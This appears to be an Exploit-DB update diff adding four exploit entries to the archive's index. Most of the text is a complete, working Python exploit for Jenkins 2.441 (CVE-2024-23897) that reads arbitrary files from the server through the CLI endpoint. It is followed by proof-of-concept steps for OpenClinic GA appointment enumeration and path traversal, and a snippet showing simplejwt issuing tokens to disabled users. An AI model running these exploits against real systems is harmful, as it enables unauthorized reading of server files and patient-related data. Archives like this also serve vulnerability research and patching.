DB: 2024-04-16

5 changes to exploits/shellcodes/ghdb

Jenkins 2.441 - Local File Inclusion
OpenClinic GA 5.247.01 - Information Disclosure
OpenClinic GA 5.247.01 - Path Traversal (Authenticated)

djangorestframework-simplejwt 5.3.1 - Information Disclosure

exploits/java/webapps/51993.py

@@ -0,0 +1,149 @@
+# Exploit Title: Jenkins 2.441 - Local File Inclusion
+# Date: 14/04/2024
+# Exploit Author: Matisse Beckandt (Backendt)
+# Vendor Homepage: https://www.jenkins.io/
+# Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip
+# Version: 2.441
+# Tested on: Debian 12 (Bookworm)
+# CVE: CVE-2024-23897
+
+from argparse import ArgumentParser
+from requests import Session, post, exceptions
+from threading import Thread
+from uuid import uuid4
+from time import sleep
+from re import findall
+
+class Exploit(Thread):
+  def __init__(self, url: str, identifier: str):
+    Thread.__init__(self)
+    self.daemon = True
+    self.url = url
+    self.params = {"remoting": "false"}
+    self.identifier = identifier
+    self.stop_thread = False
+    self.listen = False
+
+  def run(self):
+    while not self.stop_thread:
+      if self.listen:
+        self.listen_and_print()
+
+  def stop(self):
+    self.stop_thread = True
+
+  def receive_next_message(self):
+    self.listen = True
+
+  def wait_for_message(self):
+    while self.listen:
+      sleep(0.5)
+
+  def print_formatted_output(self, output: str):
+    if "ERROR: No such file" in output:
+      print("File not found.")
+    elif "ERROR: Failed to parse" in output:
+      print("Could not read file.")
+
+    expression = "No such agent \"(.*)\" exists."
+    results = findall(expression, output)
+    print("\n".join(results))
+
+  def listen_and_print(self):
+    session = Session()
+    headers = {"Side": "download", "Session": self.identifier}
+    try:
+      response = session.post(self.url, params=self.params, headers=headers)
+    except (exceptions.ConnectTimeout, exceptions.ConnectionError):
+      print("Could not connect to target to setup the listener.")
+      exit(1)
+
+    self.print_formatted_output(response.text)
+    self.listen = False
+
+  def send_file_request(self, filepath: str):
+    headers = {"Side": "upload", "Session": self.identifier}
+    payload = get_payload(filepath)
+    try:
+      post(self.url, data=payload, params=self.params, headers=headers, timeout=4)
+    except (exceptions.ConnectTimeout, exceptions.ConnectionError):
+      print("Could not connect to the target to send the request.")
+      exit(1)
+
+  def read_file(self, filepath: str):
+    self.receive_next_message()
+    sleep(0.1)
+    self.send_file_request(filepath)
+    self.wait_for_message()
+
+def get_payload_message(operation_index: int, text: str) -> bytes:
+  text_bytes = bytes(text, "utf-8")
+  text_size = len(text_bytes)
+  text_message = text_size.to_bytes(2) + text_bytes
+  message_size = len(text_message)
+
+  payload = message_size.to_bytes(4) + operation_index.to_bytes(1) + text_message
+  return payload
+
+def get_payload(filepath: str) -> bytes:
+  arg_operation = 0
+  start_operation = 3
+
+  command = get_payload_message(arg_operation, "connect-node")
+  poisoned_argument = get_payload_message(arg_operation, f"@{filepath}")
+
+  payload = command + poisoned_argument + start_operation.to_bytes(1)
+  return payload
+
+def start_interactive_file_read(exploit: Exploit):
+  print("Press Ctrl+C to exit")
+  while True:
+    filepath = input("File to download:\n> ")
+    filepath = make_path_absolute(filepath)
+    exploit.receive_next_message()
+
+    try:
+      exploit.read_file(filepath)
+    except exceptions.ReadTimeout:
+      print("Payload request timed out.")
+
+def make_path_absolute(filepath: str) -> str:
+    if not filepath.startswith('/'):
+      return f"/proc/self/cwd/{filepath}"
+    return filepath
+
+def format_target_url(url: str) -> str:
+  if url.endswith('/'):
+    url = url[:-1]
+  return f"{url}/cli"
+
+def get_arguments():
+  parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897")
+  parser.add_argument("-u", "--url", required=True, help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/")
+  parser.add_argument("-p", "--path", help="The absolute path of the file to download")
+  return parser.parse_args()
+
+def main():
+  args = get_arguments()
+  url = format_target_url(args.url)
+  filepath = args.path
+  identifier = str(uuid4())
+
+  exploit = Exploit(url, identifier)
+  exploit.start()
+
+  if filepath:
+    filepath = make_path_absolute(filepath)
+    exploit.read_file(filepath)
+    exploit.stop()
+    return
+
+  try:
+    start_interactive_file_read(exploit)
+  except KeyboardInterrupt:
+    pass
+  print("\nQuitting")
+  exploit.stop()
+
+if __name__ == "__main__":
+  main()

exploits/php/webapps/51994.md

@@ -0,0 +1,32 @@
+# Exploit Title: OpenClinic GA 5.247.01 - Information Disclosure
+# Date: 2023-08-14
+# Exploit Author: VB
+# Vendor Homepage: https://sourceforge.net/projects/open-clinic/
+# Software Link: https://sourceforge.net/projects/open-clinic/
+# Version: OpenClinic GA 5.247.01
+# Tested on: Windows 10, Windows 11
+# CVE: CVE-2023-40278
+
+# Details
+An Information Disclosure vulnerability was discovered in the printAppointmentPdf.jsp component of OpenClinic GA 5.247.01. The issue arises due to improper handling of error messages in response to manipulated input, allowing an attacker to deduce the existence of specific appointments.
+
+# Proof of Concept (POC)
+Steps to Reproduce:
+
+- Access the Vulnerable Component:
+
+- Navigate to the URL: http://[IP]:10088/openclinic/planning/printAppointmentPdf.jsp?AppointmentUid=1.1.
+- Manipulating the AppointmentUid Parameter:
+
+- Change the `AppointmentUid` parameter value to test different IDs.
+
+- For example, try different numerical values or formats.
+- Observing the Responses:
+
+- Note the system's response when accessing with different `AppointmentUid` values.
+- A "document is not open" error indicates the existence of an appointment with the specified ID.
+- A different error message or response indicates non-existence.
+- Confirming the Vulnerability:
+
+- The differing error messages based on the existence of an appointment confirm the Information Disclosure vulnerability.
+- This allows an unauthorized user to deduce whether specific appointments exist without direct access to appointment data. As a result, an attacker could deduce the number of appointments performed by private clinics, surgeries and private doctors.

exploits/php/webapps/51995.md

@@ -0,0 +1,34 @@
+# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
+# Date: 2023-08-14
+# Exploit Author: V. B.
+# Vendor Homepage: https://sourceforge.net/projects/open-clinic/
+# Software Link: https://sourceforge.net/projects/open-clinic/
+# Version: OpenClinic GA 5.247.01
+# Tested on: Windows 10, Windows 11
+# CVE: CVE-2023-40279
+
+# Details
+An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.
+
+# Proof of Concept (POC)
+Steps to Reproduce:
+
+- Crafting the Malicious GET Request:
+
+- Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.
+- Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):
+
+GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
+Host: 192.168.100.5:10088
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
+Connection: close
+Cookie: JSESSIONID=[SESSION ID]
+Cache-Control: max-age=0
+
+2. Confirming the Vulnerability:
+- Send the crafted GET request to the target server.
+- If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.
+- This vulnerability can lead to sensitive information disclosure or more severe attacks.

exploits/python/webapps/51992.py

@@ -0,0 +1,42 @@
+# Exploit Title: djangorestframework-simplejwt 5.3.1 - Information Disclosure
+# Date: 26/01/2024
+# Exploit Author: Dhrumil Mistry (dmdhrumilmistry)
+# Vendor Homepage: https://github.com/jazzband/djangorestframework-simplejwt/
+# Software Link:https://github.com/jazzband/djangorestframework-simplejwt/releases/tag/v5.3.1
+# Version: <= 5.3.1
+# Tested on: MacOS
+# CVE : CVE-2024-22513
+
+# The version of djangorestframework-simplejwt up to 5.3.1 is vulnerable.
+# This vulnerability has the potential to cause various security issues,
+# including Business Object Level Authorization (BOLA), Business Function
+# Level Authorization (BFLA), Information Disclosure, etc. The vulnerability
+# arises from the fact that a user can access web application resources even
+# after their account has been disabled, primarily due to the absence of proper
+# user validation checks.
+
+# If a programmer generates a JWT token for an inactive user using
+`AccessToken`
+# class and `for_user` method then a JWT token is returned which can
+be used for
+# authentication across the django and django rest framework application.
+
+# Start Django Shell using below command:
+# python manage.py shell
+# ----------------------------------------
+
+# Create inactive user and generate token for the user
+from django.contrib.auth.models import User
+from rest_framework_simplejwt.tokens import AccessToken
+
+# create inactive user
+inactive_user_id = User.objects.create_user('testuser',
+'test@example.com', 'testPassw0rd!', is_active=False).id
+
+# django application programmer generates token for the inactive user
+AccessToken.for_user(User.objects.get(id=inactive_user_id))  # error
+should be raised since user is inactive
+
+# django application verifying user token
+AccessToken.for_user(User.objects.get(id=inactive_user_id)).verify() #
+no exception is raised during verification of inactive user token

files_exploits.csv

@@ -5535,6 +5535,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49237,exploits/java/webapps/49237.txt,"Jenkins 2.235.3 - 'Description' Stored XSS",2020-12-11,gx1,webapps,java,,2020-12-11,2020-12-11,0,CVE-2020-2230,,,,,
 49232,exploits/java/webapps/49232.txt,"Jenkins 2.235.3 - 'tooltip' Stored Cross-Site Scripting",2020-12-11,gx1,webapps,java,,2020-12-11,2020-12-11,0,CVE-2020-2229,,,,,
 49244,exploits/java/webapps/49244.txt,"Jenkins 2.235.3 - 'X-Forwarded-For' Stored XSS",2020-12-14,gx1,webapps,java,,2020-12-14,2021-02-17,0,CVE-2020-2231,,,,,
+51993,exploits/java/webapps/51993.py,"Jenkins 2.441 - Local File Inclusion",2024-04-15,"Matisse Beckandt",webapps,java,,2024-04-15,2024-04-15,0,CVE-2024-23897,,,,,
 48904,exploits/java/webapps/48904.txt,"Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in",2020-10-19,"Daniel Morris",webapps,java,,2020-10-19,2020-10-19,0,CVE-2019-1003030,,,,,
 47598,exploits/java/webapps/47598.py,"Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting",2019-11-08,vesche,webapps,java,,2019-11-08,2019-11-08,0,CVE-2019-10475,,,,,
 47111,exploits/java/webapps/47111.txt,"Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting",2019-07-12,"Ishaq Mohammed",webapps,java,,2019-07-12,2019-07-12,0,CVE-2019-10349,"Cross-Site Scripting (XSS)",,,,
@@ -25202,6 +25203,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12476,exploits/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Inclusions",2010-05-01,cr4wl3r,webapps,php,,2010-04-30,,1,OSVDB-64245;CVE-2010-1944;OSVDB-64244;OSVDB-64243;OSVDB-64242;OSVDB-64241;OSVDB-64240;OSVDB-64239;OSVDB-64238;OSVDB-64237;OSVDB-64236;OSVDB-64235;OSVDB-64234;OSVDB-64233;OSVDB-64232;OSVDB-64231;OSVDB-64230;OSVDB-64229;OSVDB-64228;OSVDB-64227;OSVDB-64226;OSVDB-64225;OSVDB-64224;OSVDB-64223,,,,http://www.exploit-db.comopenmairie_cimetiere_2.01.zip,
 40513,exploits/php/webapps/40513.txt,"OpenCimetiere 3.0.0-a5 - Blind SQL Injection",2016-10-12,Wadeek,webapps,php,,2016-10-12,2016-10-19,0,,,,,http://www.exploit-db.comopencimetiere_3.0.0-a5.zip,
 15838,exploits/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQL Injection / Persistent Cross-Site Scripting on FrontPage",2010-12-28,"Michael Brooks",webapps,php,,2010-12-28,2010-12-28,1,,,,,,
+51994,exploits/php/webapps/51994.md,"OpenClinic GA 5.247.01 - Information Disclosure",2024-04-15,VB,webapps,php,,2024-04-15,2024-04-15,0,CVE-2023-40278,,,,,
+51995,exploits/php/webapps/51995.md,"OpenClinic GA 5.247.01 - Path Traversal (Authenticated)",2024-04-15,VB,webapps,php,,2024-04-15,2024-04-15,0,CVE-2023-40279,,,,,
 44391,exploits/php/webapps/44391.html,"OpenCMS 10.5.3 - Cross-Site Request Forgery",2018-04-02,"Sureshbabu Narvaneni",webapps,php,,2018-04-02,2018-04-02,0,CVE-2018-8811,,,,,
 44392,exploits/php/webapps/44392.txt,"OpenCMS 10.5.3 - Cross-Site Scripting",2018-04-02,"Sureshbabu Narvaneni",webapps,php,,2018-04-02,2018-04-02,0,CVE-2018-8815,,,,,
 12396,exploits/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,cr4wl3r,webapps,php,,2010-04-25,,1,OSVDB-64211;CVE-2010-1936,,,,http://www.exploit-db.comopenmairie_cominterne_1.01.zip,
@@ -34911,6 +34914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,,2020-01-06,2020-04-13,1,CVE-2019-19844,,,,,https://ryu22e.org/en/posts/2019/12/25/django-cve-2019-19844/
 40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869
 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,,
+51992,exploits/python/webapps/51992.py,"djangorestframework-simplejwt 5.3.1 - Information Disclosure",2024-04-15,"Dhrumil Mistry",webapps,python,,2024-04-15,2024-04-15,0,CVE-2024-22513,,,,,
 51580,exploits/python/webapps/51580.txt,"Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)",2023-07-11,"Sander Ferdinand",webapps,python,,2023-07-11,2023-07-11,0,,,,,,
 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz,